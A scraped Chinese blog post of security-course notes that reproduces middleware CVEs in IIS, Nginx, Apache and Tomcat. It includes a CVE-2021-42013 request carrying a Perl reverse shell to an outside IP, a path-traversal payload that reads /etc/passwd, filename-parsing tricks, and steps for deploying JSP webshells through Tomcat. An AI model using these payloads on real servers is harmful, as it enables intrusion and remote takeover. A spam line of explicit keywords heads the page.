国产 无码 综合区,色欲AV无码国产永久播放,无码天堂亚洲国产AV,国产日韩欧美女同一区二区

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx

這篇具有很好參考價值的文章主要介紹了小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx。希望對大家有所幫助。如果存在錯誤或未考慮完全的地方,請大家不吝賜教,您也可以點擊"舉報違法"按鈕提交疑問。

一.中間件-IIS-短文件&解析&藍屏

IIS現(xiàn)在用的也少了,漏洞也基本沒啥用

1、短文件:信息收集

2、文件解析:還有點用

3、HTTP.SYS:藍屏崩潰?

?沒有和權(quán)限掛鉤

4、CVE-2017-7269 條件過老

windows 2003上面的漏洞

二.中間件-Nginx-文件解析&命令執(zhí)行等

1. 后綴解析 文件名解析

配置不當:該漏洞與 Nginx、php 版本無關(guān),屬于用戶配置不當造成的解析漏洞。

這個跟文件上傳類似,找到文件上傳點,上傳png圖片

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

找到上傳路徑和nginx版本號

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

查看路徑

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

添加后綴可以用php執(zhí)行png

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

在圖片里添加phpinfo執(zhí)行

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

2. CVE-2013-4547

影響版本:Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

填入phpinfo

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

在1.jpg后加一個空格

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

獲得路徑地址

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

在jpg后加入兩個空格.php

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

然后切換到Hex頁面

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

將20? 20? 中后面的20替換為00

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

成功

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

3. cve_2021_23017 無 EXP

CVE-2021-23017:nginx DNS解析漏洞PoC公開-騰訊云開發(fā)者社區(qū)-騰訊云 (tencent.com)

4. cve_2017_7529 敏感信息泄露,意義不大

三.中間件-Apache-RCE&目錄遍歷&文件解析等

Apache HTTP Server 是美國阿帕奇(Apache)基金會的一款開源網(wǎng)頁服務(wù)器。該服 務(wù)器具有快速、可靠且可通過簡單的 API 進行擴充的特點,發(fā)現(xiàn) Apache HTTP Server 2.4.50 中針對 CVE-2021-41773 的修復(fù)不夠充分。攻擊者可以使用路徑遍 歷攻擊將 URL 映射到由類似別名的指令配置的目錄之外的文件。如果這些目錄之外的文 件不受通常的默認配置“要求全部拒絕”的保護,則這些請求可能會成功。如果還為這些別 名路徑啟用了 CGI 腳本,則這可能允許遠程代碼執(zhí)行。此問題僅影響 Apache 2.4.49 和 Apache 2.4.50,而不影響更早版本。

1.cve_2021_42013 RCE

監(jiān)聽端口

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

修改抓包內(nèi)容,用POST提交,下面的是使用棱角社區(qū)生成的perl的反彈shell命令

POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh 
echo;perl -e 'use 
Socket;$i="47.94.236.117";$p=5566;socket(S,PF_INET,SOCK_STREAM,ge
tprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i))))
{open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/b
in/sh -i");};'

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

成功

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

2.cve_2021_41773 目錄穿越

Apache HTTP Server 2.4.49、2.4.50 版本對路徑規(guī)范化所做的更改中存在一個路 徑穿越漏洞,攻擊者可利用該漏洞讀取到 Web 目錄外的其他文件,如系統(tǒng)配置文件、網(wǎng) 站源碼等,甚至在特定情況下,攻擊者可構(gòu)造惡意請求執(zhí)行命令,控制服務(wù)器。

在Burp中修改:例如獲取/etc/passwd下的目錄信息 /icons/.%%32%65/%%32%65%%32%65/%%32%65%%32%65/%%32%65%%32%65/etc/ passwd

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

3、cve-2017-15715

必須是黑名單

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

修改樣式小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

在下面的1.php后加一個空格,在Hex對應(yīng)位置改為0a

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

5、cve-2017-9798

? ? ? ? 信息泄露? 價值不高。

6、cve-2018-11759

????????價值不高。

7、cve-2021-37580

? ? ? ? shenyu 插件問題。

四.中間件-Tomcat-弱口令&文件上傳&文件包含等

1.弱口令

進入頁面,點擊manager或直接url輸入進去登錄頁面

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

可以爆破

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

找到文件上傳點,上傳jsp的后門代碼,壓縮為zip后改名后綴war再上傳小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

訪問該頁面觸發(fā)后門代碼

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

鏈接

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

2.cve-2017-12615

put一個1.jsp? ?

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

訪問地址,再用哥斯拉鏈接就ok,這個后門代碼是剛剛哥斯拉生成的

3.cve-2020-1938

就是一個文件包含漏洞

這里用了一個python3的

dacade/CVE-2020-1938 (github.com)

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全

4.cve-2020-11996

拒絕服務(wù),危害過大

5.cve-2020-9484

反序列化

這啥條件啊,太苛刻了= =

小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx,安全,中間件,網(wǎng)絡(luò)安全文章來源地址http://www.zghlxwxcb.cn/news/detail-767064.html

到了這里,關(guān)于小迪安全 第59天 服務(wù)攻防-中間件安全&CVE 復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx的文章就介紹完了。如果您還想了解更多內(nèi)容,請在右上角搜索TOY模板網(wǎng)以前的文章或繼續(xù)瀏覽下面的相關(guān)文章,希望大家以后多多支持TOY模板網(wǎng)!

本文來自互聯(lián)網(wǎng)用戶投稿,該文觀點僅代表作者本人,不代表本站立場。本站僅提供信息存儲空間服務(wù),不擁有所有權(quán),不承擔相關(guān)法律責(zé)任。如若轉(zhuǎn)載,請注明出處: 如若內(nèi)容造成侵權(quán)/違法違規(guī)/事實不符,請點擊違法舉報進行投訴反饋,一經(jīng)查實,立即刪除!

領(lǐng)支付寶紅包贊助服務(wù)器費用

相關(guān)文章

  • Day79:服務(wù)攻防-中間件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    Day79:服務(wù)攻防-中間件安全&IIS&Apache&Tomcat&Nginx&弱口令&不安全配置&CVE

    目錄 中間件-IIS-短文件文件解析藍屏寫權(quán)限 HTTP.SYS(CVE-2015-1635)主要用作藍屏破壞,跟權(quán)限不掛鉤 IIS短文件(iis全版本都可能有這個問題) IIS文件解析 IIS寫權(quán)限 中間件-Nginx-文件解析目錄穿越漏洞CRLF CVE-2013-4547 文件上傳 解析漏洞(配置不當) 目錄穿越(配置不當) CRLF注入(配置

    2024年04月08日
    瀏覽(23)
  • 33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    33、WEB攻防——通用漏洞&文件上傳&中間件解析漏洞&編輯器安全

    IIS爆過漏洞的版本:IIS6.0(windows server 2003)、IIS7.0和IIS7.5(windows server 2008) IIS6.0解析漏洞: 文件名:x.asp;x.jpg,jpg的文件后綴名,但是會被解析為asp文件; 目錄名:x.asp/x.jpg, 文件目錄名含有.asp后綴,x.jpg也會被解析為asp文件。 觸發(fā)條件: IIS6.0這個中間件; 上傳文件能不

    2024年01月24日
    瀏覽(31)
  • 中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&Weblogic&Jenkins&GlassFish漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-Weblogic安全 2、中間件-JBoos安全 3、中間件-Jenkins安全 4、中間件-GlassFish安全 常見中間件的安全測試: 1、配置

    2024年02月08日
    瀏覽(19)
  • 中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    中間件安全-CVE復(fù)現(xiàn)&IIS&Apache&Tomcat&Nginx漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,Weblogic,JBoos,WebSphere, Jenkins ,GlassFish,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp, Spring,F(xiàn)lask,jQuery等 1、中間件-IIS-短文件解析藍屏等 2、中間件-Nginx-文件解析命令執(zhí)行等 3、中間件-Apache-RCE目錄遍歷文件解析等 4、中間件

    2024年02月07日
    瀏覽(22)
  • 中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件安全-CVE 復(fù)現(xiàn)&K8s&Docker&Jetty&Websphere漏洞復(fù)現(xiàn)

    中間件及框架列表: IIS,Apache,Nginx,Tomcat,Docker,K8s,Weblogic,JBoos,WebSphere,Jenkins ,GlassFish,Jetty,Jira,Struts2,Laravel,Solr,Shiro,Thinkphp,Spring,F(xiàn)lask,jQuery 等。 中間件所披露的問題: 中間件安全-IISApacheTomcatNginx漏洞復(fù)現(xiàn) 中間件安全-WeblogicJenkinsGlassFish漏洞復(fù)現(xiàn) 1、中間

    2024年02月08日
    瀏覽(26)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全

    先自我介紹一下,小編浙江大學(xué)畢業(yè),去過華為、字節(jié)跳動等大廠,目前阿里P7 深知大多數(shù)程序員,想要提升技能,往往是自己摸索成長,但自己不成體系的自學(xué)效果低效又漫長,而且極易碰到天花板技術(shù)停滯不前! 因此收集整理了一份《2024年最新網(wǎng)絡(luò)安全全套學(xué)習(xí)資料》

    2024年04月24日
    瀏覽(49)
  • day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    day33WEB 攻防-通用漏洞&;文件上傳&;中間件解析漏洞&;編輯器安全(1)

    2、解析漏洞-nginx.conf 配置不當 二,Web 應(yīng)用編輯器-Ueditor 文件上傳安全 三,實例 CMS平臺-中間件解析編輯器引用 配套資源下載(百度網(wǎng)盤): 鏈接:https://pan.baidu.com/s/11Q9sAPQ9P_ReOP9PKL0ABg?pwd=jgg4? 提取碼:jgg4 本章節(jié)知識點: 1 、中間件安全問題 2 、中間件文件上傳解析 3 、

    2024年04月15日
    瀏覽(28)
  • express中間件當做前端服務(wù)器的安全漏洞處理

    使用express當做node服務(wù)器時,發(fā)現(xiàn)安全漏洞,記錄處理步驟: PS:以下安全內(nèi)容處理,需要使用到redis進行會話存儲、請求計數(shù)、請求唯一限制等。為盡量確保開發(fā)環(huán)境與部署環(huán)境一致,請開發(fā)環(huán)境安裝并啟動Redis服務(wù)。 ** 此文檔只是說明記錄關(guān)鍵步驟。具體實現(xiàn)代碼可參照附

    2024年03月27日
    瀏覽(27)
  • 中間件漏洞(一)CVE-2013-4547(文件名邏輯漏洞)

    中間件漏洞(一)CVE-2013-4547(文件名邏輯漏洞)

    目錄 1. 了解nginx的工作原理 2. 漏洞原理及舉例分析 3. 前端php源碼分析 4. 注入思路 5. 漏洞復(fù)現(xiàn) 5.1 上傳文件并抓包分析 ?5.2 通過訪問文件執(zhí)行php ?注意一點 6. 漏洞修復(fù) nginx是以PHP語言為主。像Apache一樣,Nginx自身是不支持解析PHP語言的,只能通過加載PHP模塊來解析PHP。原理圖

    2024年02月02日
    瀏覽(16)
  • 中間件安全:Apache Tomcat 弱口令.(反彈 shell 拿到服務(wù)器的最高控制權(quán).)

    中間件安全:Apache Tomcat 弱口令.(反彈 shell 拿到服務(wù)器的最高控制權(quán).)

    Tomcat? 是 Apache 軟件基金會(Apache Software Foundation)的 Jakarta 項目中的一個核心項目,由 Apache、Sun 和其他一些公司及個人共同開發(fā)而成。 通過弱口令登錄后臺,部署 war 包 geshell . 中間件安全:Apache Tomcat?弱口令. Apache Tomcat 弱口令: 靶場準備:Web安全:Vulfocus 靶場搭建.(漏

    2024年02月05日
    瀏覽(27)

覺得文章有用就打賞一下文章作者

支付寶掃一掃打賞

博客贊助

微信掃一掃打賞

請作者喝杯咖啡吧~博客贊助

支付寶掃一掃領(lǐng)取紅包,優(yōu)惠每天領(lǐng)

二維碼1

領(lǐng)取紅包

二維碼2

領(lǐng)紅包